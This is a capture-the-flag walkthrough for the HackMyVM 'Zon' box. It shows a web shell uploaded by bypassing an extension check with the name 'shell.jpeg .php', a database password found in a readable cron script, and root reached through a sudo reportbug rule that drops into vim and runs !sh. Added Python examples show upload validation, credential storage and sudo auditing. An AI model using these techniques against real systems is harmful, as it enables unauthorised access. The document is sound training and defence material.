HMV Zon Box Walkthrough
Information Gathering
```bash
IP=192.168.0.196
```
Two ports are open. Opening the site in a browser shows a coffee-bean shop.
Run a directory scan:
```bash
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://$IP -x php,txt,html,bk,bak,zip,tar,gz,7z -t 50
```
The first thing that stands out is /upload.php, but it returns status 500, so it is probably the endpoint that receives the upload. A blind guess that choose.php is the file-selection page turns out to be right: it asks for a ZIP file containing JPEG files.
Open Burp Suite and upload a legitimate ZIP first.
The response is "File 3.jpeg.zip has been uploaded." Looking at http://192.168.0.196/uploads/ at this point, my 3.jpeg has already been extracted there.
What if I put a shell.php inside?
The server answers: "File shell.gif.php.zip has been uploaded. Archive contains non-JPEG files. It will be deleted."
So files that are not JPEG get deleted. My first reaction to "It will be deleted." was that the file must exist for a moment, so perhaps a race condition? On second thought, there is no guarantee the file was even extracted, so the detection method, and how to get around it, still need to be worked out.
First, test whether it is an extension check. After several attempts, "shell.jpeg .php" (with a space before .php) goes through.
Visiting http://192.168.0.196/uploads/ again, shell.jpeg .php is there. Start a local listener, open the file, and get a shell.
```bash
pwncat-cs -lp 1234
```
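Before moving on, here is what the upload handler could have done to stop this. This is an added example, not code from the Zon box or its author: a hypothetical validator for the same "ZIP of JPEGs" upload that checks every entry name and its content before anything is written to the web root, so there is no extract-then-delete window. The archive and the filenames in it (including the "shell.jpeg .php" name that worked above) are constructed for the demonstration.

```python
"""Server-side validation for a 'ZIP of JPEGs' upload.

Added example (not code from the Zon box or its author). It assumes a
hypothetical upload handler that, like the one on the box, extracts a
ZIP into a web-served uploads/ directory. The sample archive below and
the entry names in it are constructed for the demonstration.
"""
from __future__ import annotations

import io
import os
import re
import zipfile

JPEG_MAGIC = b"\xff\xd8\xff"  # SOI marker that every JPEG file starts with
# Exactly one extension, no spaces, no path characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g)$", re.IGNORECASE)


def safe_entry_name(name: str) -> bool:
    """Accept only a flat, single-extension JPEG filename.

    Rejects directory components, traversal, whitespace and double
    extensions, so names such as 'shell.jpeg .php' or 'shell.gif.php'
    never reach disk.
    """
    if os.path.basename(name) != name:  # any directory component is a red flag
        return False
    return SAFE_NAME.fullmatch(name) is not None


def is_jpeg(data: bytes) -> bool:
    """Check the content, not just the name: a name check alone was bypassed on the box."""
    return data[:3] == JPEG_MAGIC


def validate_archive(zip_bytes: bytes) -> tuple[list[str], list[str]]:
    """Return (accepted, rejected) entry names.

    Every entry is inspected in memory first; a real handler would extract
    only the accepted ones afterwards, so a bad entry is never present in
    the uploads directory even briefly.
    """
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not safe_entry_name(info.filename):
                rejected.append(info.filename)
                continue
            if not is_jpeg(zf.read(info)):
                rejected.append(info.filename)
                continue
            accepted.append(info.filename)
    return accepted, rejected


def build_sample_zip() -> bytes:
    """Constructed test archive: one real JPEG header plus three disguised files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("3.jpeg", JPEG_MAGIC + b"\xe0" + b"\x00" * 16)
        zf.writestr("shell.jpeg .php", b"<?php /* placeholder */ ?>")
        zf.writestr("shell.gif.php", b"<?php /* placeholder */ ?>")
        zf.writestr("fake.jpeg", b"<?php /* placeholder */ ?>")  # right name, wrong content
    return buf.getvalue()


if __name__ == "__main__":
    ok, bad = validate_archive(build_sample_zip())
    print("accepted:", ok)
    print("rejected:", bad)
```

Running it accepts only 3.jpeg; the two double-extension names fail the name check and fake.jpeg fails the content check. The two checks are deliberately independent: a PHP file renamed to .jpeg is caught by the magic bytes, and a real JPEG with a second extension is caught by the name rule.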
Privilege Escalation
sudo -l asks for a password. A quick look through the cron jobs turns up nothing, and the home directory /home/freddie is not readable. Under /var/www/html there is a hashDB.sh that looks interesting: it contains the database password.
```bash
# script that checks the database's integrity every minute
dump=/dev/shm/dump.sql
log=/var/log/db_integrity_check.log
true > "${log}"
/usr/bin/mysqldump -u admin -pudgrJbFc6Av#U3 admin credentials > "${dump}"
/usr/bin/sed -i '$d' "${dump}"
hash="29d8e6b76aab0254f7fe439a6a5d2fba64270dde087e6dfab57fa57f6749858a"
check_hash=$(sha256sum "${dump}" | awk '{print $1}')
if [[ "${hash}" != "${check_hash}" ]] ; then
/usr/bin/wall "Alert ! Database hacked !"
/usr/bin/du -sh /var/lib/mysql >> "${log}"
/usr/bin/vmstat 1 3 >> "${log}"
else
/usr/bin/sync && /usr/bin/echo 3 > /proc/sys/vm/drop_caches
/usr/bin/echo "$(date) : Integrity check completed for ${dump}" >> "${log}"
fi
```
Logging in to the database with that password gives us Freddie's password, and logging in as Freddie with it succeeds. Both sessions follow.
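A defender's note on hashDB.sh: the check itself is sound (the last line of a mysqldump is a timestamp, so stripping it keeps the hash stable from minute to minute), but the database password is baked into a script that www-data can read. The following is an added example, not the box's script: it re-implements the check in Python on a constructed dump so the behaviour can be tested, and shows the credential moved into an owner-only MySQL option file that `mysqldump --defaults-extra-file` can read instead. The option-file path and the password value are placeholders.

```python
"""What hashDB.sh does, and how to keep the credential out of it.

Added example, not code from the Zon box. It re-implements the script's
check (dump, drop the last line, sha256, compare) in Python and shows the
database credentials read from a root-only option file instead of being
written into a world-readable script. SAMPLE_DUMP is constructed.
"""
from __future__ import annotations

import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Constructed stand-in for `mysqldump ... admin credentials`. mysqldump ends
# its output with a timestamped "-- Dump completed on ..." line, which is why
# the script strips the last line before hashing; otherwise the hash would
# change every minute even when the data did not.
SAMPLE_DUMP = (
    "-- MariaDB dump (constructed sample)\n"
    "CREATE TABLE `credentials` (`username` varchar(32), `password` varchar(64));\n"
    "INSERT INTO `credentials` VALUES ('Freddie','<password placeholder>');\n"
    "-- Dump completed on 2024-01-01 00:00:00\n"
)


def strip_last_line(dump: str) -> str:
    """Equivalent of `sed -i '$d'`: drop the final line of the dump."""
    lines = dump.splitlines(keepends=True)
    return "".join(lines[:-1])


def dump_hash(dump: str) -> str:
    """sha256 of the normalised dump, as `sha256sum | awk '{print $1}'` reports it."""
    return hashlib.sha256(strip_last_line(dump).encode()).hexdigest()


def integrity_ok(dump: str, expected_hash: str) -> bool:
    """The script's if/else: True when the stored hash matches the fresh dump."""
    return dump_hash(dump) == expected_hash


def write_option_file(path: Path, user: str, password: str) -> Path:
    """Write a MySQL client option file readable only by its owner (mode 0600).

    mysqldump --defaults-extra-file=<path> reads the credentials from here,
    so the password no longer appears in the script text. The script itself
    should then live outside the web root and be owned by root.
    """
    path.write_text(f"[client]\nuser={user}\npassword={password}\n")
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return path


def option_file_is_private(path: Path) -> bool:
    """True when group and other have no permission bits on the option file."""
    mode = stat.S_IMODE(path.stat().st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def demo_option_file() -> bool:
    """Create an option file in a temporary directory and confirm it is owner-only."""
    with tempfile.TemporaryDirectory() as d:
        opt = write_option_file(Path(d) / "db.cnf", "admin", "<password placeholder>")
        return option_file_is_private(opt)


if __name__ == "__main__":
    baseline = dump_hash(SAMPLE_DUMP)
    later = SAMPLE_DUMP.replace("2024-01-01 00:00:00", "2024-01-01 00:01:00")
    tampered = SAMPLE_DUMP.replace("Freddie", "Mallory")
    print("same data, new timestamp:", integrity_ok(later, baseline))
    print("tampered row:", integrity_ok(tampered, baseline))
    print("option file private:", demo_option_file())
```

The two dumps that differ only in the trailing timestamp hash to the same value, while a changed row does not, which is exactly the property the cron job relies on. With the credential in a 0600 option file owned by root, a reader of the script (or of the web root) learns nothing about the database password.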
```
(remote) www-data@zon:/var/www/html$ mysql -u admin -pudgrJbFc6Av#U3
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 32
Server version: 10.11.4-MariaDB-1~deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| admin              |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.008 sec)
MariaDB [(none)]> use admin
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [admin]> show tablesl;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'tablesl' at line 1
MariaDB [admin]> show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| credentials     |
+-----------------+
1 row in set (0.000 sec)
MariaDB [admin]> select * from credentials
    -> ;
+----------+-------------------------+
| username | password                |
+----------+-------------------------+
| Freddie  | LDVK@dYiEa2I1lnjrEeoMif |
+----------+-------------------------+
1 row in set (0.001 sec)
```
```
(remote) www-data@zon:/var/www/html$ su freddie
Password:
╰─$ id
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),100(users)
╭─freddie@zon /var/www/html
╰─$ sudo -l
sudo: unable to resolve host zon: Name or service not known
Matching Defaults entries for freddie on zon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User freddie may run the following commands on zon:
    (ALL : ALL) NOPASSWD: /usr/bin/reportbug
```
/usr/bin/reportbug appears to be Debian's bug-reporting tool. The first time it runs it walks you through some basic configuration; after that, run it once more.
```bash
sudo /usr/bin/reportbug
```
On the second run it drops into a vim window; typing !sh there gives a root shell.
```
sudo /usr/bin/reportbug 1 ↵
sudo: unable to resolve host zon: Name or service not known
Running 'reportbug' as root is probably insecure! Continue [y|N|q|?]? y
Please enter the name of the package in which you have found a problem, or type 'other' to report a more
general problem. If you don't know what package the bug is in, please contact debian-
[email protected] for assistance.
> other
Please enter the name of the package in which you have found a problem, or choose one of these bug
categories:
1 bugs.debian.org The bug tracking system, @bugs.debian.org
2 buildd.debian.org Problems and requests related to the Debian Buildds
3 buildd.emdebian.org Problems related to building packages for Emdebian
4 cdimage.debian.org CD Image issues
5 cdrom Installation system
6 cloud.debian.org Issues involving Debian images for public/private clouds
7 contributors.debian.org Issues with the Debian Contributors Website and coordination of maintenance
8 d-i.debian.org Issues regarding the d-i.debian.org service and general Debian Installer
tasks
9 debian-i18n Requests regarding Internationalization (i18n) of the distribution
10 debian-live General problems with Debian Live systems
11 ftp.debian.org Problems with the FTP site and Package removal requests
12 general General problems (e.g. "many manpages are mode 755")
13 installation-reports Reports of installation problems with stable & testing
14 jenkins.debian.org Issues with the jenkins.debian.org service
15 lists.debian.org The mailing lists, debian-*@lists.debian.org
16 manpages.debian.org Issues with the Debian Manpages Website and coordination of maintenance
17 mirrors Problems with the official mirrors
18 nm.debian.org New Member process and nm.debian.org webpages
19 pet.debian.net The Debian Package Entropy Tracker
20 piuparts.debian.org Issues with the piuparts.debian.org service
21 press Press release issues
22 project Problems related to project administration
23 qa.debian.org The Quality Assurance group
24 release-notes Problems with the Release Notes
25 release.debian.org Requests regarding Debian releases and release team tools
26 rtc.debian.org Issues in the operation of the Debian RTC services which are not package-
specific bugs
27 security-tracker The Debian Security Bug Tracker
28 security.debian.org The Debian Security Team
29 snapshot.debian.org Issues with the snapshot.debian.org service
30 spam Spam (reassign spam to here so we can complain about it)
31 sponsorship-requests Requests for package review and sponsorship
32 sso.debian.org Problems and requests related to the Debian Single Sign On system
33 summit.debconf.org Problems and requests related to the DebConf Summit instance
34 tech-ctte The Debian Technical Committee (see the Constitution)
35 tracker.debian.org Issues with the Debian Package Tracker and coordination of its maintenance
36 upgrade-reports Reports of upgrade problems for stable & testing
37 wiki.debian.org Problems with the Debian wiki
38 wnpp Work-Needing and Prospective Packages list
39 www.debian.org Problems with the WWW site
Enter a package: 1
Are you reporting a problem with this program (reportbug) [Y|n|q|?]? Y
*** Welcome to reportbug. Use ? for help at prompts. ***
Note: bug reports are publicly archived (including the email address of the submitter).
Detected character set: UTF-8
Please change your locale if this is incorrect.
Using 'root <[email protected]>' as your from address.
Getting status for reportbug...
Checking for newer versions at madison and https://ftp-master.debian.org/new.html
Your version (12.0.0) of reportbug appears to be out of date.
The following newer release(s) are available in the Debian archive:
testing: 13.0.1
unstable: 13.0.1
Please try to verify if the bug you are about to report is already addressed by these releases. Do you still want to file a report [y|N|q|?]? y
Will send report to Debian (per lsb_release).
Querying Debian BTS for reports on reportbug src:reportbug...
132 bug reports found:
Bugs with severity important
1) #786740 apt-listbugs: Get errors while trying to download bugs E: Input/output error @ io_fillbu
2) #786748 bugs.debian.org: some SOAP requests to bugs.debian.org hang
3) #853915 reportbug: Retrieved base64 messages aren't decoded
4) #987334 reportbug: replying via "x - Provide extra information" breaks threading, In-Reply-To/Re
(1-4/132) Is the bug you found listed above [y|N|b|m|r|q|s|f|e|?]? 1
Retrieving report #786740 from Debian bug tracking system...
```
```
id
uid=0(root) gid=0(root) groups=0(root)
```
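On the sudo side, the lesson is that a NOPASSWD rule for a program that hands off to an interactive editor is effectively a root shell, however harmless the program looks. The script below is an added example, not part of this writeup or of reportbug: it parses `sudo -l` output like the one above and flags such rules unless they carry sudo's NOEXEC tag, which prevents a dynamically linked program run under sudo from starting child processes. The list of editor-spawning programs is an assumption for the demonstration, and the sample input is the rule from this box.

```python
"""Audit `sudo -l` output for rules that hand out an interactive editor.

Added example, not code from the Zon box or from reportbug. The set of
programs treated as able to reach an editor is an assumption for the
demonstration; extend it from your own review. SAMPLE_SUDO_L reproduces
the rule shown on the box.
"""
from __future__ import annotations

import re

# Programs that, once running with sudo, open an interactive editor through
# which the user can run further commands. Assumed list, not authoritative.
EDITOR_CAPABLE = {
    "reportbug": "hands the report off to the user's editor (vim on the box)",
    "vim": "interactive editor with a shell escape",
    "vi": "interactive editor with a shell escape",
}

# "(runas) TAG: TAG: /path/cmd, /path/other" as printed by `sudo -l`.
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for freddie on zon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, use_pty

User freddie may run the following commands on zon:
    (ALL : ALL) NOPASSWD: /usr/bin/reportbug
"""


def parse_rules(sudo_l_output: str) -> list[dict]:
    """Extract runas, tags and commands from the 'may run the following' section."""
    rules = []
    in_commands = False
    for raw in sudo_l_output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmds": cmds})
    return rules


def findings(sudo_l_output: str) -> list[str]:
    """One finding per command that can reach an editor and is not tagged NOEXEC."""
    out = []
    for rule in parse_rules(sudo_l_output):
        for cmd in rule["cmds"]:
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if prog in EDITOR_CAPABLE and "NOEXEC" not in rule["tags"]:
                auth = "without password" if "NOPASSWD" in rule["tags"] else "with password"
                out.append(
                    f"{cmd} as ({rule['runas']}) {auth}: {EDITOR_CAPABLE[prog]}; "
                    "add NOEXEC or remove the rule"
                )
    return out


if __name__ == "__main__":
    for finding in findings(SAMPLE_SUDO_L):
        print(finding)
```

On the box's rule this produces one finding for /usr/bin/reportbug; the same rule written as `NOEXEC: NOPASSWD: /usr/bin/reportbug` produces none, because sudo would then refuse to let reportbug (a Python program) launch the editor at all. Removing the rule is the cleaner fix, since a bug-reporting tool has no need for root.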